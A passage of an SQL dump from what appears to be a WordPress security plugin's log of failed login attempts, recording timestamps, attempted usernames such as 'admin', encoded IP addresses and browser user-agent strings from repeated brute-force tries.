Safari/537.36'),(5395,7483,1629335265.838867,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����3','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.122 Safari/537.36'),(5396,7484,1629335311.805972,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0��?���','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0'),(5397,7484,1629335311.836564,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0��?���','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0'),(5398,7485,1629336071.143837,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����/�','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36'),(5399,7486,1629336882.012800,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����[','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),(5400,7487,1629338491.523966,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��mW�','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36'),(5401,7488,1629339311.741578,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\"W#�','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36'),(5402,7489,1629340132.042121,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��C��','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36'),(5403,7490,1629340958.820132,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��*��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36'),(5404,7490,1629340958.881329,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��*��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36'),(5405,7491,1629341782.220729,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Dd@','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36'),(5406,7492,1629342589.721845,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��t˖G','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36'),(5407,7493,1629343381.258223,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Z�w','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36'),(5408,7494,1629344163.573743,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��3�Sq','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36'),(5409,7495,1629344931.373938,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\"P�R','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Safari/537.36'),(5410,7496,1629345692.775398,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��gm','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(5411,7497,1629346452.201812,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Rʬ�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Safari/537.36'),(5412,7498,1629347211.155219,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��νh','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.163 Safari/537.36'),(5413,7499,1629347956.798167,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Z�&','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36'),(5414,7500,1629348691.152272,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��#��','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36'),(5415,7501,1629350136.913297,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��(z��','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36'),(5416,7502,1629350555.943293,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0���6�M','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36'),(5417,7502,1629350556.048010,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0���6�M','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36'),(5418,7503,1629350865.045929,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����_','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.107 Safari/537.36'),(5419,7504,1629351593.195885,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\"W#�','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36'),(5420,7505,1629352323.934195,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���=��','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),(5421,7506,1629353060.913519,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���#�','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36'),(5422,7506,1629353060.995295,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���#�','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36'),(5423,7507,1629354542.784610,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\'l\0�','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36'),(5424,7508,1629355277.095059,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��իо','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.106 Safari/537.36'),(5425,7509,1629358263.195066,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��/� ','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36'),(5426,7510,1629359010.654959,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��3','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.122 Safari/537.36'),(5427,7511,1629359247.730315,1,'loginFailInvalidUsername','test',0,'\0\0\0\0\0\0\0\0\0\0��%0xc','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5428,7512,1629359762.082763,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),(5429,7513,1629360512.365768,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���MW','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36'),(5430,7514,1629360786.478268,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0��k�0�','Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0'),(5431,7515,1629361268.516640,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���I�-','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),(5432,7516,1629361423.367117,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���i�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5433,7517,1629362027.564710,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��ܧe','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36'),(5434,7518,1629362791.848103,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Vҳ','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36'),(5435,7519,1629363558.625238,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���0B�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5436,7520,1629363567.019222,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��ν','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36'),(5437,7521,1629364341.587303,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Avv','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36'),(5438,7522,1629365125.627315,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��ν2�','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(5439,7523,1629365731.591050,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���ً','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5440,7524,1629365911.148060,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��%�\r�','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36'),(5441,7525,1629366720.649759,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��QEˣ','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36'),(5442,7526,1629366813.592425,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���*t\Z','Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; InfoPath.2; Zune 3.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)'),(5443,7527,1629367589.351038,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Y��','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36'),(5444,7528,1629367802.566934,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��?�$�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5445,7529,1629369296.844725,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����[','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36'),(5446,7530,1629370145.402473,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��vE��','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36'),(5447,7531,1629370208.281333,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���פ�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5448,7532,1629372076.862425,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36'),(5449,7533,1629372416.022740,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����j','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5450,7534,1629374282.397872,1,'loginFailInvalidUsername','webma_user',0,'\0\0\0\0\0\0\0\0\0\0��>�a','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5451,7535,1629374282.690548,1,'loginFailInvalidUsername','webma_user',0,'\0\0\0\0\0\0\0\0\0\0��>�a','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5452,7536,1629374282.978404,1,'loginFailInvalidUsername','webma_user',0,'\0\0\0\0\0\0\0\0\0\0��>�a','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5453,7537,1629374283.324668,1,'loginFailInvalidUsername','webma_user',0,'\0\0\0\0\0\0\0\0\0\0��>�a','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5454,7538,1629374283.618038,1,'loginFailInvalidUsername','webma_user',0,'\0\0\0\0\0\0\0\0\0\0��>�a','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5455,7539,1629374283.959200,1,'loginFailInvalidUsername','webma_user',0,'\0\0\0\0\0\0\0\0\0\0��>�a','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5456,7540,1629374284.280819,1,'loginFailInvalidUsername','webma_user',0,'\0\0\0\0\0\0\0\0\0\0��>�a','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5457,7541,1629374284.580105,1,'loginFailInvalidUsername','webma_user',0,'\0\0\0\0\0\0\0\0\0\0��>�a','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5458,7542,1629374284.884468,1,'loginFailInvalidUsername','webma_user',0,'\0\0\0\0\0\0\0\0\0\0��>�a','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5459,7543,1629374285.224573,1,'loginFailInvalidUsername','webma_user',0,'\0\0\0\0\0\0\0\0\0\0��>�a','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5460,7544,1629374285.574251,1,'loginFailInvalidUsername','webma_user',0,'\0\0\0\0\0\0\0\0\0\0��>�a','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5461,7545,1629374285.892798,1,'loginFailInvalidUsername','webma_user',0,'\0\0\0\0\0\0\0\0\0\0��>�a','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5462,7546,1629374286.537060,1,'loginFailInvalidUsername','webma_user',0,'\0\0\0\0\0\0\0\0\0\0��>�a','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5463,7547,1629374286.795790,1,'loginFailInvalidUsername','webma_user',0,'\0\0\0\0\0\0\0\0\0\0��>�a','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5464,7548,1629374287.100232,1,'loginFailInvalidUsername','webma_user',0,'\0\0\0\0\0\0\0\0\0\0��>�a','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5465,7549,1629374287.347528,1,'loginFailInvalidUsername','webma_user',0,'\0\0\0\0\0\0\0\0\0\0��>�a','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5466,7550,1629374287.606624,1,'loginFailInvalidUsername','webma_user',0,'\0\0\0\0\0\0\0\0\0\0��>�a','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5467,7551,1629374287.919847,1,'loginFailInvalidUsername','webma_user',0,'\0\0\0\0\0\0\0\0\0\0��>�a','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5468,7552,1629374288.217926,1,'loginFailInvalidUsername','webma_user',0,'\0\0\0\0\0\0\0\0\0\0��>�a','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5469,7554,1629374651.958485,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��ˉsq','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5470,7555,1629376884.723721,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����9d','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5471,7556,1629379112.426533,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��3QJ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5472,7557,1629381282.011386,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���iq','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5473,7558,1629383519.047742,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5474,7559,1629385787.736963,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5475,7560,1629387097.517734,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:31.0) Gecko/20100101 Firefox/31.0'),(5476,7561,1629388080.313900,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���A��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5477,7562,1629390264.026797,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���פ�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5478,7563,1629392435.248166,1,'loginFailInvalidUsername','co',0,'\0\0\0\0\0\0\0\0\0\0��^��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5479,7564,1629393392.270850,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����|','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(5480,7565,1629393401.445354,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����|','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(5481,7566,1629393405.355502,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����|','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(5482,7567,1629393409.884664,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����|','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(5483,7568,1629393412.873268,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����|','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(5484,7569,1629393415.172568,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����|','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(5485,7570,1629393419.644556,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����|','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(5486,7571,1629393421.953186,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����|','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(5487,7572,1629393424.028790,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����|','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(5488,7573,1629393426.335426,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����|','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(5489,7574,1629393430.151446,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����|','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(5490,7574,1629393430.369029,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����|','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(5491,7575,1629393432.642532,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����|','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(5492,7576,1629393433.274743,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����|','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(5493,7577,1629393433.863655,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����|','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(5494,7578,1629393434.250637,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����|','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(5495,7579,1629393434.670928,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����|','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(5496,7580,1629393435.429916,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����|','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(5497,7581,1629393435.896742,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����|','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(5498,7584,1629396795.597144,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0��k�.4','Mozilla/5.0 (Windows NT 6.3; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0'),(5499,7585,1629399027.156973,1,'loginFailInvalidUsername','co',0,'\0\0\0\0\0\0\0\0\0\0��*p&U','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5500,7586,1629401236.478773,1,'loginFailInvalidUsername','co',0,'\0\0\0\0\0\0\0\0\0\0��#� ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5501,7587,1629403373.333723,1,'loginFailInvalidUsername','co',0,'\0\0\0\0\0\0\0\0\0\0����R','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5502,7588,1629405038.940807,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���>M�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5503,7589,1629405458.183792,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���`J','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5504,7590,1629405522.145124,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0��g]�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5505,7591,1629405936.462808,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����v�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5506,7592,1629406435.627944,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Oe,','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5507,7593,1629406952.500011,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��gљ ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5508,7594,1629407496.779967,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\\��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5509,7595,1629407643.710482,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0��)�H�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5510,7596,1629407966.654165,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0��k�;�','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.76.4 (KHTML, like Gecko) Version/7.0.4 Safari/537.76.4'),(5511,7597,1629408043.070927,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���#y�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) 